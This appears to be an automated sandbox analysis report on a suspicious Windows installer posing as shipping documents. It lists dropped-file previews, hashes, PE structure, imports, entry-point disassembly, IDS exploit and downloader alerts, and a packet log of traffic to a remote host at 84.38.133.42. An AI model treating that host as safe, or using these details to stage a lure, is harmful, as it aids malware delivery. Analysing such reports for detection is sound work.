                                              Preview:............r.........*.................................................k..........................|.C.................&.....................................3...........;........i>..[2....B.........B.....h.................V.............................................................0...x....<...(.............................................:............C.......q....................u..........................................................."..........g.....E..................................6..................................n......4...........O.....:..........B.O..............8......X........8...t........................... ..7.fJ#.....|..............)........................1...........X....(..........................4.............................>.c.........F..............\........t......;.................W.............;..................................3.........L..m.........<.......(.................i...........@...........+..............o.f.....{...............bW...........4..
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):400
                                              Entropy (8bit):4.340884176214527
                                              Encrypted:false
                                              SSDEEP:12:ABodXqUr8bKPlUsoyXqy6oHLrccOrMH2m:kaq+vUWqv08VMf
                                              MD5:71229AB517CA5DAC3316733FE5538924
                                              SHA1:0DB282ED1142AA8D850E0BEC60D502DF3A8D786B
                                              SHA-256:C7FB70336975F025E346E7B884A1641BDF4A9510315D059F1509A51249EDDD07
                                              SHA-512:77C36AFF187EC195EAF128B4696F54E18B297A9797922ECA97E3147EE9F49A0BA15ECB81BE7ED65C6D199D83EA8BC7823D30AACBA5B35351312EBAB25C658DDC
                                              Malicious:false
                                              Preview:retsmdes cakavci stykvrker terylene penumbrous cuprotungstite paleontology sukrings..extravasation kunstmaler naturvidenskabeliges pointer nabbers pasfotografi forholdende anesthaetically feberkramper..savvrk optimalvrdierne oversigterne.serpuloid astrobiological decimaltegn udefinerbar,acidophil gis bolvrks hretisk sprays sevald tamilske,makie adherant indsejling kassedamerne fluor pantochromism.
                                              Process:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):14243
                                              Entropy (8bit):2.3093269369302396
                                              Encrypted:false
                                              SSDEEP:192:ys2EB7EvpKyCMZFGrgNerrpDYvMo4E1+iI2tjx:ysfdCyGerrpUvxZ+7+t
                                              MD5:B6F7202B553B5DC0A1B7D7B141FE8A64
                                              SHA1:68B48ED6E05998B9F6E590510F74AD5677620EE7
                                              SHA-256:D1465221589C115AFA440E20E7E63E6E7D70B8DAE1CA87710A8FFD6D7D8EADC5
                                              SHA-512:4D7B9795444537247FF1851B0C557A1235E90DDDB49ABCDC64DBC9612BB2347D675734FAA6121D0875EF099B0C453A278C977463CE1D4453142CB19127244506
                                              Malicious:false
                                              Preview:....0.........................................(..........!.................+....................k..[............Z...............&....................$...................................;.........................................).................................;...................no.........N................k...........X..........g.....................R.........4.....h..e....................................>.....O...Q.....................r+......n..............x... .....B....................R...........................U..................................0......i....m............>................l.......[.....................................p.....................................u.....K.G...s...................3..................p..........v.......w....E......Cr.......................................................F.............m#...............].T.......................*.......j............................4a...............................n....r............b..............................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.672045494218853
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Shipping documents 000293994900.exe
                                              File size:739'546 bytes
                                              MD5:c8d26f7208eaaa31a839ec190489c9a1
                                              SHA1:c9bc4695a4f4afdcc89d216b7ad8d0ce4d0bc7e3
                                              SHA256:f96b6c703fe5b13fd985d91da265c58d3d5b2f81397ebe27527e59c208819d2e
                                              SHA512:30983bc1f3b8fc96023d5b2773ab41ee1ced9718334d1cc50a24143a4d6ed04dfdc9400c9f401df20bc7dd05919a5936b3e7fb97c7504f804cd06210eee7f168
                                              SSDEEP:12288:8tvD9kg2V9Lki65FEdYjpTEl9msWkXfflWGwzc7MnWAdV/sPsrVawwDXZsBwRsOd:1XlP60dM4b1nlMGMnWAdV9wtsBShx
                                              TLSH:ADF4224E3AD4A436CD663D77997ECBA9F270BB2508A42E0336807F2F0A7761F6514217
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                              Icon Hash:86933931792d7578
                                              Entrypoint:0x403358
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push ebp
                                              push esi
                                              push edi
                                              push 00000020h
                                              xor ebp, ebp
                                              pop esi
                                              mov dword ptr [esp+14h], ebp
                                              mov dword ptr [esp+10h], 00409230h
                                              mov dword ptr [esp+1Ch], ebp
                                              call dword ptr [00407034h]
                                              push 00008001h
                                              call dword ptr [004070BCh]
                                              push ebp
                                              call dword ptr [004072ACh]
                                              push 00000008h
                                              mov dword ptr [00429298h], eax
                                              call 00007F6831031FBCh
                                              mov dword ptr [004291E4h], eax
                                              push ebp
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebp
                                              push 00420690h
                                              call dword ptr [0040717Ch]
                                              push 0040937Ch
                                              push 004281E0h
                                              call 00007F6831031C27h
                                              call dword ptr [00407134h]
                                              mov ebx, 00434000h
                                              push eax
                                              push ebx
                                              call 00007F6831031C15h
                                              push ebp
                                              call dword ptr [0040710Ch]
                                              cmp word ptr [00434000h], 0022h
                                              mov dword ptr [004291E0h], eax
                                              mov eax, ebx
                                              jne 00007F683102F10Ah
                                              push 00000022h
                                              mov eax, 00434002h
                                              pop esi
                                              push esi
                                              push eax
                                              call 00007F6831031666h
                                              push eax
                                              call dword ptr [00407240h]
                                              mov dword ptr [esp+18h], eax
                                              jmp 00007F683102F1CEh
                                              push 00000020h
                                              pop edx
                                              cmp cx, dx
                                              jne 00007F683102F109h
                                              inc eax
                                              inc eax
                                              cmp word ptr [eax], dx
                                              je 00007F683102F0FBh
                                              add word ptr [eax], 0000h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x2d490.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5e660x6000e8f12472e91b02deb619070e6ee7f1f4False0.6566569010416666data6.419409887460116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x202d80x600a5ec1b720d350c6303a7aba8d85072bfFalse0.4733072916666667data3.7600484096214832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2a0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x540000x2d4900x2d6003469fad129cc4f5d98277ff568dc0969False0.603391873278237data6.111326163907691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x543580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.376375251390039
                                              RT_ICON0x64b800xe444PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9933089191594223
                                              RT_ICON0x72fc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4520794824399261
                                              RT_ICON0x784500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4557156353330184
                                              RT_ICON0x7c6780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5064315352697095
                                              RT_ICON0x7ec200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.551829268292683
                                              RT_ICON0x7fcc80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6086065573770492
                                              RT_ICON0x806500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                              RT_DIALOG0x80ab80x100dataEnglishUnited States0.5234375
                                              RT_DIALOG0x80bb80x11cdataEnglishUnited States0.6056338028169014
                                              RT_DIALOG0x80cd80xc4dataEnglishUnited States0.5918367346938775
                                              RT_DIALOG0x80da00x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x80e000x76dataEnglishUnited States0.7542372881355932
                                              RT_VERSION0x80e780x310dataEnglishUnited States0.4846938775510204
                                              RT_MANIFEST0x811880x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                              DLLImport
                                              KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-31T11:39:18.753332+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549704TCP
                                              2024-10-31T11:39:59.461244+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.556127TCP
                                              2024-10-31T11:40:48.544514+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.55619484.38.133.4280TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 31, 2024 11:40:47.716845989 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:47.721791983 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:47.721913099 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:47.722033024 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:47.726777077 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544364929 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544387102 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544399023 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544409990 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544421911 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544431925 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.544513941 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.544620037 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.659996986 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660048962 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660062075 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660072088 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660088062 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660124063 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660135031 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660140038 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.660149097 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660162926 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.660167933 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.660222054 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.661145926 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.661170006 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.661180973 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.661231041 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.661231041 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.775604963 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775641918 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775666952 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775718927 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775748968 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.775789976 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.775859118 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775921106 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775934935 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775945902 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.775971889 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.776004076 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.776721954 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.776813984 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.776823997 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.776866913 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.776881933 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.776930094 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777085066 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777096033 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777107000 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777117968 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777137995 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777169943 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777688026 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777705908 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777723074 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777734995 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777744055 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777744055 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777746916 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.777780056 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777780056 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.777817011 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.778542042 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.778584957 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.778594971 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:48.778649092 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:48.778649092 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.018129110 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.018450022 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.018467903 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.018477917 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.018490076 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.018515110 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.018538952 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.018548012 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.018565893 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019567966 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019586086 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019598007 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019609928 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019618034 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019618034 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019635916 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019648075 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019670010 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019680977 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019690990 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019701958 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019714117 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019717932 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019723892 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019752979 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019861937 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019928932 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019941092 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019949913 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019962072 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.019969940 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.019984961 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.020008087 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.020800114 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.020839930 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.020855904 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.020868063 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.020879984 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.020881891 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.020912886 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.020927906 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.022365093 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022408009 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022429943 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022437096 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022443056 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022536039 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.022695065 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022752047 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022763968 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022797108 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.022813082 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022818089 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.022825956 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.022866964 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.023374081 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.023396015 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.023407936 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.023447990 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.023447990 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.023447990 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.023468971 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.023510933 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.024271011 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.024326086 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.024336100 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.024347067 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.024358034 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.024374962 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.024422884 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.024422884 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.025104046 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.025115013 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.025126934 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.025161028 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.025187969 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.025191069 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.025204897 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.025248051 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.025959969 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026092052 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026117086 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026130915 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026149035 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.026149035 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.026184082 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.026185036 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.026190996 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026204109 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.026243925 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027014971 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027025938 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027036905 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027066946 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027082920 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027194977 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027206898 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027236938 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027869940 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027882099 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027893066 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027920008 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027920008 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.027935982 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.027961969 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.028512001 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.028619051 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.028630018 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.028640985 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.028651953 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.028661013 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.028691053 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.029412985 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.029423952 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.029452085 CET5619480192.168.2.584.38.133.42
